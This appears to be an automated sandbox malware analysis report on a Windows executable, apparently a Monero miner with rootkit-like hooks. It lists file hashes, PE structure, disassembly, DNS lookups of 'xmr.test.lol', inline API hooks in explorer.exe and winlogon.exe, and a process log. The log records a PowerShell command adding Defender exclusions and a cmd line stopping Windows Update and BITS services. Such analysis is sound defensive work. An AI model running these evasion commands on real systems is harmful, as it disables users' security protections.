                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.663338824111387
                            TrID:
                            • Win64 Executable (generic) (12005/4) 74.95%
                            • Generic Win/DOS Executable (2004/3) 12.51%
                            • DOS Executable Generic (2002/1) 12.50%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                            File name:test2.exe
                            File size:5'986'304 bytes
                            MD5:80b97cc01243be6495f5df52bcdd6bdf
                            SHA1:5fe219bfdf8d6825130dcb5414bf05cc56899af5
                            SHA256:3e178f8b58d7c27ad58180fa75f779e2cf3b141ee3839f17bad52d17fb0642db
                            SHA512:32dda4f4432fe22bd91bd5849e7cd3d890a3c79c33b595de38259584a8140e2865bc1789e64e30396b245cf93a26b5a9e669e01d8669101bbfca768727c9f7f6
                            SSDEEP:98304:4NShsPyXqeWGimFHC/Hxvz/IuiLx4bIu2x4c0FdTxJw7N:4lPISXmdC/RvDIuiLx4B2Sc073oN
                            TLSH:0056D0513B3D6529FFD08D34FA0C05D1FEAA5FA54809804DA72A693320FB676563EF28
                            File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....T[..$.............@..............................[.....\][...`... ............................
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x1400014b0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x66BA0EAC [Mon Aug 12 13:31:24 2024 UTC]
                            TLS Callbacks:0x40010670, 0x1, 0x40010640, 0x1
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f7505c167603909b7180406402fef19e
                            Instruction
                            dec eax
                            sub esp, 28h
                            dec eax
                            mov eax, dword ptr [005B0F65h]
                            mov dword ptr [eax], 00000001h
                            call 00007F6F1CC33BDFh
                            nop
                            nop
                            dec eax
                            add esp, 28h
                            ret
                            nop dword ptr [eax]
                            dec eax
                            sub esp, 28h
                            dec eax
                            mov eax, dword ptr [005B0F45h]
                            mov dword ptr [eax], 00000000h
                            call 00007F6F1CC33BBFh
                            nop
                            nop
                            dec eax
                            add esp, 28h
                            ret
                            nop dword ptr [eax]
                            dec eax
                            sub esp, 28h
                            call 00007F6F1CC4C304h
                            dec eax
                            test eax, eax
                            sete al
                            movzx eax, al
                            neg eax
                            dec eax
                            add esp, 28h
                            ret
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            dec eax
                            lea ecx, dword ptr [00000009h]
                            jmp 00007F6F1CC33EF9h
                            nop dword ptr [eax+00h]
                            ret
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            dec eax
                            lea eax, dword ptr [005B5EC9h]
                            dec eax
                            lea edx, dword ptr [eax+21h]
                            mov byte ptr [eax], 00000000h
                            dec eax
                            add eax, 01h
                            dec eax
                            cmp eax, edx
                            jne 00007F6F1CC33F16h
                            ret
                            dec eax
                            lea eax, dword ptr [005B5E71h]
                            dec eax
                            lea edx, dword ptr [eax+18h]
                            mov word ptr [eax], 0000h
                            dec eax
                            add eax, 02h
                            dec eax
                            cmp eax, edx
                            jne 00007F6F1CC33F14h
                            ret
                            dec eax
                            lea eax, dword ptr [005B5E37h]
                            dec eax
                            lea edx, dword ptr [eax+14h]
                            mov word ptr [eax], 0000h
                            dec eax
                            add eax, 02h
                            dec eax
                             Name | Virtual Address | Virtual Size | Is in Section
                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5b9000 | 0xa34 | .idata
                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5bc000 | 0x388 | .rsrc
                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x5b3000 | 0x120c | .pdata
                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5bd000 | 0x330 | .reloc
                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_TLS | 0x5b1a20 | 0x28 | .rdata
                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_IAT | 0x5b928c | 0x250 | .idata
                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             .text | 0x1000 | 0x1aac0 | 0x1ac00 | b0b077a3db2220f130909a237824d51e | False | 0.4662036360981308 | data | 6.153048911846253 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                             .data | 0x1c000 | 0x592ce0 | 0x592e00 | 9b6c02b5fc57e3de11af7fbf29d5834b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rdata | 0x5af000 | 0x3c90 | 0x3e00 | 4a9f1198ecc387af8f69f29bfae8181c | False | 0.3563508064516129 | OpenPGP Secret Key | 5.058508498376052 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             .pdata | 0x5b3000 | 0x120c | 0x1400 | c69bd9ebe130b67c716b6bda7283e221 | False | 0.43515625 | data | 4.848454879968458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             .xdata | 0x5b5000 | 0xf3c | 0x1000 | f370cfd23bcc837456ef5efe8db977e3 | False | 0.242431640625 | data | 4.027695444359416 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             .bss | 0x5b6000 | 0x2300 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .idata | 0x5b9000 | 0xa34 | 0xc00 | 464abe84bf8b78db1849d73c667379d2 | False | 0.3043619791666667 | data | 3.8910320952277866 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .CRT | 0x5ba000 | 0x60 | 0x200 | adb160d33c9222b01107a717786b06d7 | False | 0.06640625 | data | 0.3054436955437607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .tls | 0x5bb000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rsrc | 0x5bc000 | 0x388 | 0x400 | dff04db7c2f3138a978d69d74fb533d3 | False | 0.4521484375 | data | 5.023865484975868 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .reloc | 0x5bd000 | 0x330 | 0x400 | 996512c52c772ca6a040a72e00cb2f2a | False | 0.576171875 | data | 4.806707426175319 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                             Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                             RT_MANIFEST | 0x5bc058 | 0x330 | XML 1.0 document, ASCII text | English | United States | 0.508578431372549
                             DLL | Import
                             KERNEL32.dll | CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                             msvcrt.dll | __C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                             Language of compilation system | Country where language is spoken
                             English | United States
                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                             Aug 12, 2024 15:36:06.888955116 CEST | 56815 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:07.093630075 CEST | 53 | 56815 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:13.010113001 CEST | 56860 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:13.211662054 CEST | 53 | 56860 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:19.086771965 CEST | 60511 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:19.409432888 CEST | 53 | 60511 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:25.163837910 CEST | 55307 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:25.343887091 CEST | 53 | 55307 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:31.240257025 CEST | 59331 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:31.452011108 CEST | 53 | 59331 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:37.317058086 CEST | 64564 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:37.498240948 CEST | 53 | 64564 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:43.409974098 CEST | 57268 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:43.574187040 CEST | 53 | 57268 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:49.486257076 CEST | 55383 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:49.651055098 CEST | 53 | 55383 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:36:55.578728914 CEST | 59322 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:36:55.943331957 CEST | 53 | 59322 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:01.655679941 CEST | 62689 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:01.925368071 CEST | 53 | 62689 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:07.748265028 CEST | 58140 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:08.155334949 CEST | 53 | 58140 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:13.825083971 CEST | 64279 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:14.748325109 CEST | 53 | 64279 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:19.917213917 CEST | 49248 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:20.081856966 CEST | 53 | 49248 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:25.994144917 CEST | 62609 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:26.158210993 CEST | 53 | 62609 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:32.070940971 CEST | 61485 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:32.238456011 CEST | 53 | 61485 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:38.148008108 CEST | 50210 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:38.359599113 CEST | 53 | 50210 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:44.224402905 CEST | 52546 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:44.402024031 CEST | 53 | 52546 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:50.300986052 CEST | 61038 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:50.467325926 CEST | 53 | 61038 | 9.9.9.9 | 192.168.11.20
                             Aug 12, 2024 15:37:56.377746105 CEST | 50209 | 53 | 192.168.11.20 | 9.9.9.9
                             Aug 12, 2024 15:37:56.966959953 CEST | 53 | 50209 | 9.9.9.9 | 192.168.11.20
                             Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                             Aug 12, 2024 15:36:06.888955116 CEST | 192.168.11.20 | 9.9.9.9 | 0xbac2 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:13.010113001 CEST | 192.168.11.20 | 9.9.9.9 | 0xa6b1 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:19.086771965 CEST | 192.168.11.20 | 9.9.9.9 | 0x6273 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:25.163837910 CEST | 192.168.11.20 | 9.9.9.9 | 0x7cb8 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:31.240257025 CEST | 192.168.11.20 | 9.9.9.9 | 0xa123 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:37.317058086 CEST | 192.168.11.20 | 9.9.9.9 | 0x29c0 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:43.409974098 CEST | 192.168.11.20 | 9.9.9.9 | 0x3fbd | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:49.486257076 CEST | 192.168.11.20 | 9.9.9.9 | 0xb1f2 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:55.578728914 CEST | 192.168.11.20 | 9.9.9.9 | 0x25cf | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:01.655679941 CEST | 192.168.11.20 | 9.9.9.9 | 0x4818 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:07.748265028 CEST | 192.168.11.20 | 9.9.9.9 | 0x64b8 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:13.825083971 CEST | 192.168.11.20 | 9.9.9.9 | 0x704e | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:19.917213917 CEST | 192.168.11.20 | 9.9.9.9 | 0xdc5e | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:25.994144917 CEST | 192.168.11.20 | 9.9.9.9 | 0x1e08 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:32.070940971 CEST | 192.168.11.20 | 9.9.9.9 | 0x36ca | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:38.148008108 CEST | 192.168.11.20 | 9.9.9.9 | 0xa6a4 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:44.224402905 CEST | 192.168.11.20 | 9.9.9.9 | 0xc139 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:50.300986052 CEST | 192.168.11.20 | 9.9.9.9 | 0xed25 | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:56.377746105 CEST | 192.168.11.20 | 9.9.9.9 | 0x4c5a | Standard query (0) | xmr.test.lol | A (IP address) | IN (0x0001) | false
                             Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                             Aug 12, 2024 15:36:07.093630075 CEST | 9.9.9.9 | 192.168.11.20 | 0xbac2 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:13.211662054 CEST | 9.9.9.9 | 192.168.11.20 | 0xa6b1 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:19.409432888 CEST | 9.9.9.9 | 192.168.11.20 | 0x6273 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:25.343887091 CEST | 9.9.9.9 | 192.168.11.20 | 0x7cb8 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:31.452011108 CEST | 9.9.9.9 | 192.168.11.20 | 0xa123 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:37.498240948 CEST | 9.9.9.9 | 192.168.11.20 | 0x29c0 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:43.574187040 CEST | 9.9.9.9 | 192.168.11.20 | 0x3fbd | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:49.651055098 CEST | 9.9.9.9 | 192.168.11.20 | 0xb1f2 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:36:55.943331957 CEST | 9.9.9.9 | 192.168.11.20 | 0x25cf | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:01.925368071 CEST | 9.9.9.9 | 192.168.11.20 | 0x4818 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:08.155334949 CEST | 9.9.9.9 | 192.168.11.20 | 0x64b8 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:14.748325109 CEST | 9.9.9.9 | 192.168.11.20 | 0x704e | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:20.081856966 CEST | 9.9.9.9 | 192.168.11.20 | 0xdc5e | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:26.158210993 CEST | 9.9.9.9 | 192.168.11.20 | 0x1e08 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:32.238456011 CEST | 9.9.9.9 | 192.168.11.20 | 0x36ca | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:38.359599113 CEST | 9.9.9.9 | 192.168.11.20 | 0xa6a4 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:44.402024031 CEST | 9.9.9.9 | 192.168.11.20 | 0xc139 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:50.467325926 CEST | 9.9.9.9 | 192.168.11.20 | 0xed25 | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false
                             Aug 12, 2024 15:37:56.966959953 CEST | 9.9.9.9 | 192.168.11.20 | 0x4c5a | Name error (3) | xmr.test.lol | none | none | A (IP address) | IN (0x0001) | false

                            Code Manipulations

                             Function Name | Hook Type | Active in Processes
                             ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
                             NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                             ZwResumeThread | INLINE | explorer.exe, winlogon.exe
                             NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                             ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                             NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
                             NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                             ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                             ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                             NtResumeThread | INLINE | explorer.exe, winlogon.exe
                             RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
                             NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                             NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                             ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                             ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                             Function Name | Hook Type | New Data
                             ZwEnumerateKey | INLINE | 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                             NtQuerySystemInformation | INLINE | 0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                             ZwResumeThread | INLINE | 0xE9 0x98 0x83 0x32 0x29 0x9F
                             NtDeviceIoControlFile | INLINE | 0xE9 0x9E 0xE3 0x33 0x35 0x5F
                             ZwDeviceIoControlFile | INLINE | 0xE9 0x9E 0xE3 0x33 0x35 0x5F
                             NtEnumerateKey | INLINE | 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                             NtQueryDirectoryFile | INLINE | 0xE9 0x98 0x83 0x32 0x2D 0xDF
                             ZwEnumerateValueKey | INLINE | 0xE9 0x9E 0xE3 0x33 0x32 0x2F
                             ZwQuerySystemInformation | INLINE | 0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                             NtResumeThread | INLINE | 0xE9 0x98 0x83 0x32 0x29 0x9F
                             RtlGetNativeSystemInformation | INLINE | 0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                             NtQueryDirectoryFileEx | INLINE | 0xE9 0x95 0x53 0x30 0x0C 0xCF
                             NtEnumerateValueKey | INLINE | 0xE9 0x9E 0xE3 0x33 0x32 0x2F
                             ZwQueryDirectoryFileEx | INLINE | 0xE9 0x95 0x53 0x30 0x0C 0xCF
                             ZwQueryDirectoryFile | INLINE | 0xE9 0x98 0x83 0x32 0x2D 0xDF
                             Function Name | Hook Type | New Data
                             ZwEnumerateKey | INLINE | 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                             NtQuerySystemInformation | INLINE | 0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                             ZwResumeThread | INLINE | 0xE9 0x98 0x83 0x32 0x29 0x9F
                             NtDeviceIoControlFile | INLINE | 0xE9 0x9E 0xE3 0x33 0x35 0x5F
                             ZwDeviceIoControlFile | INLINE | 0xE9 0x9E 0xE3 0x33 0x35 0x5F
                             NtEnumerateKey | INLINE | 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                             NtQueryDirectoryFile | INLINE | 0xE9 0x98 0x83 0x32 0x2D 0xDF
                             ZwEnumerateValueKey | INLINE | 0xE9 0x9E 0xE3 0x33 0x32 0x2F
                             ZwQuerySystemInformation | INLINE | 0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                             NtResumeThread | INLINE | 0xE9 0x98 0x83 0x32 0x29 0x9F
                             RtlGetNativeSystemInformation | INLINE | 0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                             NtQueryDirectoryFileEx | INLINE | 0xE9 0x95 0x53 0x30 0x0C 0xCF
                             NtEnumerateValueKey | INLINE | 0xE9 0x9E 0xE3 0x33 0x32 0x2F
                             ZwQueryDirectoryFileEx | INLINE | 0xE9 0x95 0x53 0x30 0x0C 0xCF
                             ZwQueryDirectoryFile | INLINE | 0xE9 0x98 0x83 0x32 0x2D 0xDF

                            Target ID:0
                            Start time:09:35:40
                            Start date:12/08/2024
                            Path:C:\Users\user\Desktop\test2.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\test2.exe"
                            Imagebase:0x7ff661540000
                            File size:5'986'304 bytes
                            MD5 hash:80B97CC01243BE6495F5DF52BCDD6BDF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:09:35:42
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                            Imagebase:0x7ff775920000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:09:35:42
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop UsoSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:8
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop WaaSMedicSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:9
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop wuauserv
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:10
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop bits
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:09:35:44
                            Start date:12/08/2024
